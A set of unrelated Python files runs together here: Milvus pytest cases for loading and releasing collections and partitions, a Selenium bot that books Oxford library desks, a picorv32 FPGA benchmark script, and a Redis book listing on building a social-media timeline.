connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
connect.flush([collection_name])
connect.load_collection(collection_name)
connect.release_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.drop_collection(collection)
try:
connect.release_collection(collection)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_without_flush(self, connect, collection):
"""
target: test load collection without flush
method: insert entities without flush, then load collection
expected: No exception and data can be queried
"""
result = connect.insert(collection, gen_entities(100))
assert len(result.primary_keys) == 100
connect.load_collection(collection)
int_field_name = "int64"
term_expr = f'{int_field_name} in {result.primary_keys[:1]}'
res = connect.query(collection, term_expr)
assert res == [{int_field_name: result.primary_keys[0]}]
# TODO
@pytest.mark.tags(CaseLabel.L2)
def _test_load_collection_larger_than_memory(self):
"""
target: test load collection when memory less than collection size
method: i don't know
expected: raise exception
"""
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.skip("https://github.com/milvus-io/milvus/issues/13118")
def test_load_collection_release_part_partitions(self, connect, collection):
"""
target: test release part partitions after load collection
method: load collection and release part partitions
expected: released partitions search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
connect.search(collection, **default_single_query, partition_names=[default_tag])
res = connect.search(collection, **default_single_query, partition_names=[default_partition_name])
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip("https://github.com/milvus-io/milvus/issues/13118")
def test_load_collection_release_all_partitions(self, connect, collection):
"""
target: test release all partitions after load collection
method: load collection and release all partitions
expected: search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_partition_name, default_tag])
res = connect.search(collection, **default_single_query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_load_partitions_release_collection(self, connect, collection):
"""
target: test release collection after load partitions
method: insert entities into partitions, search empty after load partitions and release collection
expected: search result empty
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
class TestReleaseAdvanced:
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into collection, flush and load collection, release collection during searching
expected: raise exception
"""
nq = 1000
top_k = 1
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
params, _ = gen_search_vectors_params(field_name, cons.default_entities, top_k, nq)
future = connect.search(collection, **params, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_during_searching(self, connect, collection):
"""
target: test release partition during searching
method: insert entities into partition, flush and load partition, release partition during searching
expected: raise exception
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_search_vectors_params(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, **query, _async=True)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception):
res = connect.search(collection, **default_single_query)
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching_A(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into partition, flush and load partition, release collection during searching
expected: raise exception
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_search_vectors_params(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, **query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
def _test_release_collection_during_loading(self, connect, collection):
"""
target: test release collection during loading
method: insert entities into collection, flush, release collection during loading
expected: raise exception
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
def _test_release_partition_during_loading(self, connect, collection):
"""
target: test release partition during loading
method: insert entities into partition, flush, release partition during loading
expected:
"""
connect.create_partition(collection, default_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, **default_single_query)
assert len(res[0]) == 0
def _test_release_collection_during_inserting(self, connect, collection):
"""
target: test release collection during inserting
method: load collection, do release collection during inserting
expected: raise exception
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
def insert():
connect.insert(collection, cons.default_entities)
t = threading.Thread(target=insert, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
res = connect.search(collection, **default_single_query)
def _test_release_collection_during_indexing(self, connect, collection):
"""
target: test release collection during building index
method: insert and flush, load collection, do release collection during creating index
expected:
"""
pass
def _test_release_collection_during_droping_index(self, connect, collection):
"""
target: test release collection during droping index
method: insert, create index and flush, load collection, do release collection during droping index
expected:
"""
pass
class TestLoadCollectionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test load invalid collection
method: load collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.load_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test release invalid collection
method: release collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.release_collection(collection_name)
class TestLoadPartition:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in cpu mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
log.info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, cons.default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
log.info(metric_type)
get_binary_index["metric_type"] = metric_type
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
connect.load_partitions(binary_collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, connect, dis_connect, collection):
"""
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
"""
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
dis_connect.load_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_dis_connect(self, connect, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
dis_connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_not_existed(self, connect, collection):
"""
target: test load partition for invalid scenario
method: load not existed partition
expected: raise exception and report the error
"""
partition_name = gen_unique_str(uid_load)
try:
connect.load_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_not_load(self, connect, collection):
"""
target: test release partition without load
method: release partition without load
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_after_drop(self, connect, collection):
"""
target: test load and release partition after drop
method: drop partition and then load and release it
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_load_release_after_collection_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_collection(collection)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection
class TestLoadPartitionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_partition_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
"""
target: test load invalid partition
method: load partition with invalid partition name
expected: raise exception
"""
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
"""
target: test release invalid partition
method: release partition with invalid partition name
expected: raise exception
"""
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
|
scraper.py
|
# Bodleian Booker Bot
import time
import sched
import json
import datetime
import threading
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.service import Service
# Define preference dictionary
preference = {"UPPER BOD":["Upper Reading Room Desk Booking","10:00","13:00","16:30"],
"LOWER BOD":["Lower Reading Room Desk Booking","10:00","13:00","16:30"],
"LAW LIB":["Law Library Desk Booking","10:00","13:00","16:30"],
"GLINK":["Gladstone Link Desk Booking","10:00","13:00","16:30"],
"UPPER RAD CAM":["Upper Camera Reader Desk Booking","10:00","13:00","16:30"],
"LOWER RAD CAM":["Lower Camera Reader Desk Booking","10:00","13:00","16:30"],
"SACKLER":["Sackler Library - Desk Booking","10:00","13:00","16:30"],
"SSL":["Social Science Library - Open Plan Desk Booking","10:00","13:00","16:30"],
"TAYLOR":["Taylor Institution Library - Desk Booking","10:00","13:00","16:30"],
"VERE":["Vere Harmsworth Library Desk Booking","10:00","13:00","16:30"]}
# Check if the xpath exists on the webpage
def hasXpath(xpath,driver):
try:
driver.find_element_by_xpath(xpath)
return True
except:
return False
# Highlight an element defined by the driver
def highlight(element):
# Highlights a Selenium webdriver element
driver = element._parent
def apply_style(s):
driver.execute_script("arguments[0].setAttribute('style', arguments[1])", element, s)
orignal_style = element.get_attribute('style')
apply_style("border: 4px solid red")
if (element.get_attribute("style")!=None):
time.sleep(5)
apply_style(orignal_style)
# Click through the bookng process
def book(userdata, service, time_day):
global preference
# Login to SSO
driver = webdriver.Remote(service.service_url)
driver.get('https://spacefinder.bodleian.ox.ac.uk/')
time.sleep(1)
email = driver.find_element_by_id('i0116')
email.send_keys(userdata[1]['username'])
time.sleep(0.5)
submit = driver.find_element_by_id("idSIButton9")
submit.click()
time.sleep(1)
password = driver.find_element_by_id("i0118")
password.send_keys(userdata[1]['password'])
time.sleep(1)
signin = driver.find_element_by_id("idSIButton9")
signin.click()
#time.sleep(6)
# Click on calendar date until it the element loads
# BUG: Wait until 10am and then refresh the page.
okay = False
while okay != True:
try:
calendar = driver.find_element_by_xpath("//span[@aria-label='" + day + "']")
calendar.click()
okay = True
except:
print("Calendar loading")
# Clicking on slot until it loads
okay = False
if time_day == "morning":
indexx = 1
elif time_day == "afternoon":
indexx = 2
else:
indexx = 3
NO_SLOTS = 0
while okay != True:
try:
# NOT PASSING PREFERENCES
slot = driver.find_element_by_xpath("//div[contains(h5, '"+preference[userdata[2][time_day]][0]+"') and contains(p, '"+preference[userdata[2][time_day]][indexx]+"')]/parent::*/descendant::a")
#highlight(slot)
slot.click()
okay = True
except:
xpather = "//h3[contains(text(), 'Sorry, no spaces found')]"
xpather2 = "//div[contains(@class, 'tickets__submit')]"
if hasXpath(xpather,driver):
print("NO MORE SLOTS")
elif hasXpath(xpather2,driver):
print("NO MORE SLOTS FOR THIS SPECIFIC ONE")
NO_SLOTS +=1
if NO_SLOTS > 3:
return
else:
print("Slots are loading")
okay = False
while okay != True:
try:
confirm = driver.find_element_by_name("ctl00$ContentPlaceHolder$Cart$CheckoutButton")
confirm.click()
okay = True
except:
print("Loading!")
okay = False
while okay != True:
try:
for key in userdata[0]:
element = driver.find_element_by_id(key)
element.send_keys(userdata[0][key])
confirm = driver.find_element_by_id("submitOrderButton")
confirm.click()
okay = True
except:
print("Loading Form!")
time.sleep(20)
ids = ["FirstNameundefined","LastNameundefined","Phoneundefined","Street2undefined","Emailundefined","ConfirmEmailundefined"]
# Gets data from json file and returns a dictionary of lists for user data
userdata = {}
try:
with open('data.json') as json_file:
data = json.load(json_file)
for p in data['users']:
current_user = p
temp = []
userdata[current_user] = [data['users'][p][item] for item in data['users'][p]]
except:
with open('userdata.json') as json_file:
data = json.load(json_file)
for p in data['users']:
current_user = p
temp = []
userdata[current_user] = [data['users'][p][item] for item in data['users'][p]]
userkeys = []
index = 0
for user in userdata:
userdata[user].insert(4,userdata[user][-4])
userkeys.append([dict(zip(ids, userdata[user][0:6]))])
userkeys[int(index)].append({"username":userdata[user][8]['username'],"password":userdata[user][8]['password']})
userkeys[int(index)].append({"morning":userdata[user][7]['morning'],"afternoon":userdata[user][7]['afternoon'],"evening":userdata[user][7]['evening']})
index += 1
# BUG Date has an extra 0 ie 08 but must be in form 8 instead ie February 8, 2021
NextDay_Date = datetime.datetime.today() + datetime.timedelta(days=3)
#day = NextDay_Date.strftime("%B %d, %Y").replace(" 0", " ")
day = NextDay_Date.strftime("%B %d, %Y")
def runner():
service = Service('chromedriver.exe')
service.start()
threads = []
times = ["morning","afternoon","evening"]
for user in userkeys:
for i in times:
print("Thread Started")
t = threading.Thread(target=book, args=(user,service,i))
threads.append(t)
t.start()
def wait_start(runTime):
startTime = datetime.time(*(map(int, runTime.split(':'))))
while startTime > datetime.datetime.today().time(): # you can add here any additional variable to break loop if necessary
time.sleep(1)# you can change 1 sec interval to any other
return runner()
wait_start('09:00')
|
picorv32_benchmark.py
|
#!/usr/bin/env python3
import os, sys, threading
from os import path
import subprocess
import re
num_runs = 8
if not path.exists("picorv32.json"):
subprocess.run(["wget", "https://raw.githubusercontent.com/cliffordwolf/picorv32/master/picorv32.v"], check=True)
subprocess.run(["yosys", "-q", "-p", "synth_ice40 -json picorv32.json -top top", "picorv32.v", "picorv32_top.v"], check=True)
fmax = {}
if not path.exists("picorv32_work"):
os.mkdir("picorv32_work")
threads = []
for i in range(num_runs):
def runner(run):
ascfile = "picorv32_work/picorv32_s{}.asc".format(run)
if path.exists(ascfile):
os.remove(ascfile)
result = subprocess.run(["../nextpnr-ice40", "--hx8k", "--seed", str(run), "--json", "picorv32.json", "--asc", ascfile, "--freq", "70"], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
if result.returncode != 0:
print("Run {} failed!".format(run))
else:
icetime_res = subprocess.check_output(["icetime", "-d", "hx8k", ascfile])
fmax_m = re.search(r'\(([0-9.]+) MHz\)', icetime_res.decode('utf-8'))
fmax[run] = float(fmax_m.group(1))
threads.append(threading.Thread(target=runner, args=[i+1]))
for t in threads: t.start()
for t in threads: t.join()
fmax_min = min(fmax.values())
fmax_max = max(fmax.values())
fmax_avg = sum(fmax.values()) / len(fmax)
print("{}/{} runs passed".format(len(fmax), num_runs))
print("icetime: min = {} MHz, avg = {} MHz, max = {} MHz".format(fmax_min, fmax_avg, fmax_max))
|
ch08_listing_source.py
|
import BaseHTTPServer
import cgi
import functools
import json
import math
import random
import socket
import SocketServer
import time
import threading
import unittest
import uuid
import urlparse
import redis
def acquire_lock_with_timeout(
conn, lockname, acquire_timeout=10, lock_timeout=10):
identifier = str(uuid.uuid4()) #A
lockname = 'lock:' + lockname
lock_timeout = int(math.ceil(lock_timeout)) #D
end = time.time() + acquire_timeout
while time.time() < end:
if conn.setnx(lockname, identifier): #B
conn.expire(lockname, lock_timeout) #B
return identifier
elif not conn.ttl(lockname): #C
conn.expire(lockname, lock_timeout) #C
time.sleep(.001)
return False
def release_lock(conn, lockname, identifier):
pipe = conn.pipeline(True)
lockname = 'lock:' + lockname
while True:
try:
pipe.watch(lockname) #A
if pipe.get(lockname) == identifier: #A
pipe.multi() #B
pipe.delete(lockname) #B
pipe.execute() #B
return True #B
pipe.unwatch()
break
except redis.exceptions.WatchError: #C
pass #C
return False #D
CONFIGS = {}
CHECKED = {}
def get_config(conn, type, component, wait=1):
key = 'config:%s:%s'%(type, component)
if CHECKED.get(key) < time.time() - wait: #A
CHECKED[key] = time.time() #B
config = json.loads(conn.get(key) or '{}') #C
old_config = CONFIGS.get(key) #D
if config != old_config: #E
CONFIGS[key] = config #F
return CONFIGS.get(key)
REDIS_CONNECTIONS = {}
def redis_connection(component, wait=1): #A
key = 'config:redis:' + component #B
def wrapper(function): #C
@functools.wraps(function) #D
def call(*args, **kwargs): #E
old_config = CONFIGS.get(key, object()) #F
_config = get_config( #G
config_connection, 'redis', component, wait) #G
config = {}
for k, v in _config.iteritems(): #L
config[k.encode('utf-8')] = v #L
if config != old_config: #H
REDIS_CONNECTIONS[key] = redis.Redis(**config) #H
return function( #I
REDIS_CONNECTIONS.get(key), *args, **kwargs) #I
return call #J
return wrapper #K
def execute_later(conn, queue, name, args):
# this is just for testing purposes
assert conn is args[0]
t = threading.Thread(target=globals()[name], args=tuple(args))
t.setDaemon(1)
t.start()
# <start id="create-twitter-user"/>
def create_user(conn, login, name):
llogin = login.lower()
lock = acquire_lock_with_timeout(conn, 'user:' + llogin, 1) #A
if not lock: #B
return None #B
if conn.hget('users:', llogin): #C
release_lock(conn, 'user:' + llogin, lock) #C
return None #C
id = conn.incr('user:id:') #D
pipeline = conn.pipeline(True)
pipeline.hset('users:', llogin, id) #E
pipeline.hmset('user:%s'%id, { #F
'login': login, #F
'id': id, #F
'name': name, #F
'followers': 0, #F
'following': 0, #F
'posts': 0, #F
'signup': time.time(), #F
})
pipeline.execute()
release_lock(conn, 'user:' + llogin, lock) #G
return id #H
# <end id="create-twitter-user"/>
#A Try to acquire the lock for the lowercased version of the login name. This function is defined in chapter 6
#B If we couldn't get the lock, then someone else already has the same login name
#C We also store a HASH of lowercased login names to user ids, so if there is already a login name that maps to an ID, we know and won't give it to a second person
#D Each user is given a unique id, generated by incrementing a counter
#E Add the lowercased login name to the HASH that maps from login names to user ids
#F Add the user information to the user's HASH
#G Release the lock over the login name
#H Return the id of the user
#END
# <start id="create-twitter-status"/>
def create_status(conn, uid, message, **data):
pipeline = conn.pipeline(True)
pipeline.hget('user:%s'%uid, 'login') #A
pipeline.incr('status:id:') #B
login, id = pipeline.execute()
if not login: #C
return None #C
data.update({
'message': message, #D
'posted': time.time(), #D
'id': id, #D
'uid': uid, #D
'login': login, #D
})
pipeline.hmset('status:%s'%id, data) #D
pipeline.hincrby('user:%s'%uid, 'posts')#E
pipeline.execute()
return id #F
# <end id="create-twitter-status"/>
#A Get the user's login name from their user id
#B Create a new id for the status message
#C Verify that we have a proper user account before posting
#D Prepare and set the data for the status message
#E Record the fact that a status message has been posted
#F Return the id of the newly created status message
#END
# <start id="fetch-page"/>
def get_status_messages(conn, uid, timeline='home:', page=1, count=30):#A
statuses = conn.zrevrange( #B
'%s%s'%(timeline, uid), (page-1)*count, page*count-1) #B
pipeline = conn.pipeline(True)
for id in statuses: #C
pipeline.hgetall('status:%s'%id) #C
return filter(None, pipeline.execute()) #D
# <end id="fetch-page"/>
#A We will take an optional 'timeline' argument, as well as page size and status message counts
#B Fetch the most recent status ids in the timeline
#C Actually fetch the status messages themselves
#D Filter will remove any 'missing' status messages that had been previously deleted
#END
# <start id="follow-user"/>
HOME_TIMELINE_SIZE = 1000
def follow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid #A
fkey2 = 'followers:%s'%other_uid #A
if conn.zscore(fkey1, other_uid): #B
return None #B
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zadd(fkey1, other_uid, now) #C
pipeline.zadd(fkey2, uid, now) #C
pipeline.zrevrange('profile:%s'%other_uid, #E
0, HOME_TIMELINE_SIZE-1, withscores=True) #E
following, followers, status_and_score = pipeline.execute()[-3:]
pipeline.hincrby('user:%s'%uid, 'following', int(following)) #F
pipeline.hincrby('user:%s'%other_uid, 'followers', int(followers)) #F
if status_and_score:
pipeline.zadd('home:%s'%uid, **dict(status_and_score)) #G
pipeline.zremrangebyrank('home:%s'%uid, 0, -HOME_TIMELINE_SIZE-1)#G
pipeline.execute()
return True #H
# <end id="follow-user"/>
#A Cache the following and followers key names
#B If the other_uid is already being followed, return
#C Add the uids to the proper following and followers ZSETs
#E Fetch the most recent HOME_TIMELINE_SIZE status messages from the newly followed user's profile timeline
#F Update the known size of the following and followers ZSETs in each user's HASH
#G Update the home timeline of the following user, keeping only the most recent 1000 status messages
#H Return that the user was correctly followed
#END
# <start id="unfollow-user"/>
def unfollow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid #A
fkey2 = 'followers:%s'%other_uid #A
if not conn.zscore(fkey1, other_uid): #B
return None #B
pipeline = conn.pipeline(True)
pipeline.zrem(fkey1, other_uid) #C
pipeline.zrem(fkey2, uid) #C
pipeline.zrevrange('profile:%s'%other_uid, #E
0, HOME_TIMELINE_SIZE-1) #E
following, followers, statuses = pipeline.execute()[-3:]
pipeline.hincrby('user:%s'%uid, 'following', int(following)) #F
pipeline.hincrby('user:%s'%other_uid, 'followers', int(followers)) #F
if statuses:
pipeline.zrem('home:%s'%uid, *statuses) #G
pipeline.execute()
return True #H
# <end id="unfollow-user"/>
#A Cache the following and followers key names
#B If the other_uid is not being followed, return
#C Remove the uids the proper following and followers ZSETs
#E Fetch the most recent HOME_TIMELINE_SIZE status messages from the user that we stopped following
#F Update the known size of the following and followers ZSETs in each user's HASH
#G Update the home timeline, removing any status messages from the previously followed user
#H Return that the unfollow executed successfully
#END
# <start id="exercise-refilling-timelines"/>
REFILL_USERS_STEP = 50
def refill_timeline(conn, incoming, timeline, start=0):
if not start and conn.zcard(timeline) >= 750: #A
return #A
users = conn.zrangebyscore(incoming, start, 'inf', #B
start=0, num=REFILL_USERS_STEP, withscores=True) #B
pipeline = conn.pipeline(False)
for uid, start in users:
pipeline.zrevrange('profile:%s'%uid, #C
0, HOME_TIMELINE_SIZE-1, withscores=True) #C
messages = []
for results in pipeline.execute():
messages.extend(results) #D
messages.sort(key=lambda x:-x[1]) #E
del messages[HOME_TIMELINE_SIZE:] #E
pipeline = conn.pipeline(True)
if messages:
pipeline.zadd(timeline, **dict(messages)) #F
pipeline.zremrangebyrank( #G
timeline, 0, -HOME_TIMELINE_SIZE-1) #G
pipeline.execute()
if len(users) >= REFILL_USERS_STEP:
execute_later(conn, 'default', 'refill_timeline', #H
[conn, incoming, timeline, start]) #H
# <end id="exercise-refilling-timelines"/>
#A If the timeline is 3/4 of the way full already, don't bother refilling it
#B Fetch a group of users that should contribute to this timeline
#C Fetch the most recent status messages from the users followed
#D Group all of the fetched status messages together
#E Sort all of the status messages by how recently they were posted, and keep the most recent 1000
#F Add all of the fetched status messages to the user's home timeline
#G Remove any messages that are older than the most recent 1000
#H If there are still more users left to fetch from, keep going
#END
# <start id="exercise-follow-user-list"/>
def follow_user_list(conn, uid, other_uid, list_id):
fkey1 = 'list:in:%s'%list_id #A
fkey2 = 'list:out:%s'%other_uid #A
timeline = 'list:statuses:%s'%list_id #A
if conn.zscore(fkey1, other_uid): #B
return None #B
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zadd(fkey1, other_uid, now) #C
pipeline.zadd(fkey2, list_id, now) #C
pipeline.zcard(fkey1) #D
pipeline.zrevrange('profile:%s'%other_uid, #E
0, HOME_TIMELINE_SIZE-1, withscores=True) #E
following, status_and_score = pipeline.execute()[-2:]
pipeline.hset('list:%s'%list_id, 'following', following) #F
pipeline.zadd(timeline, **dict(status_and_score)) #G
pipeline.zremrangebyrank(timeline, 0, -HOME_TIMELINE_SIZE-1)#G
pipeline.execute()
return True #H
# <end id="exercise-follow-user"/>
#A Cache the key names
#B If the other_uid is already being followed by the list, return
#C Add the uids to the proper ZSETs
#D Find the size of the list ZSET
#E Fetch the most recent status messages from the user's profile timeline
#F Update the known size of the list ZSETs in the list information HASH
#G Update the list of status messages
#H Return that adding the user to the list completed successfully
#END
# <start id="exercise-unfollow-user-list"/>
def unfollow_user_list(conn, uid, other_uid, list_id):
fkey1 = 'list:in:%s'%list_id #A
fkey2 = 'list:out:%s'%other_uid #A
timeline = 'list:statuses:%s'%list_id #A
if not conn.zscore(fkey1, other_uid): #B
return None #B
pipeline = conn.pipeline(True)
pipeline.zrem(fkey1, other_uid) #C
pipeline.zrem(fkey2, list_id) #C
pipeline.zcard(fkey1) #D
pipeline.zrevrange('profile:%s'%other_uid, #E
0, HOME_TIMELINE_SIZE-1) #E
following, statuses = pipeline.execute()[-2:]
pipeline.hset('list:%s'%list_id, 'following', following) #F
if statuses:
pipeline.zrem(timeline, *statuses) #G
refill_timeline(fkey1, timeline) #H
pipeline.execute()
return True #I
# <end id="exercise-unfollow-user-list"/>
#A Cache the key names
#B If the other_uid is not being followed by the list, return
#C Remove the uids from the proper ZSETs
#D Find the size of the list ZSET
#E Fetch the most recent status messages from the user that we stopped following
#F Update the known size of the list ZSETs in the list information HASH
#G Update the list timeline, removing any status messages from the previously followed user
#H Start refilling the list timeline
#I Return that the unfollow executed successfully
#END
# <start id="exercise-create-user-list"/>
def create_user_list(conn, uid, name):
pipeline = conn.pipeline(True)
pipeline.hget('user:%s'%uid, 'login') #A
pipeline.incr('list:id:') #B
login, id = pipeline.execute()
if not login: #C
return None #C
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zadd('lists:%s'%uid, **{id: now}) #D
pipeline.hmset('list:%s'%id, { #E
'name': name, #E
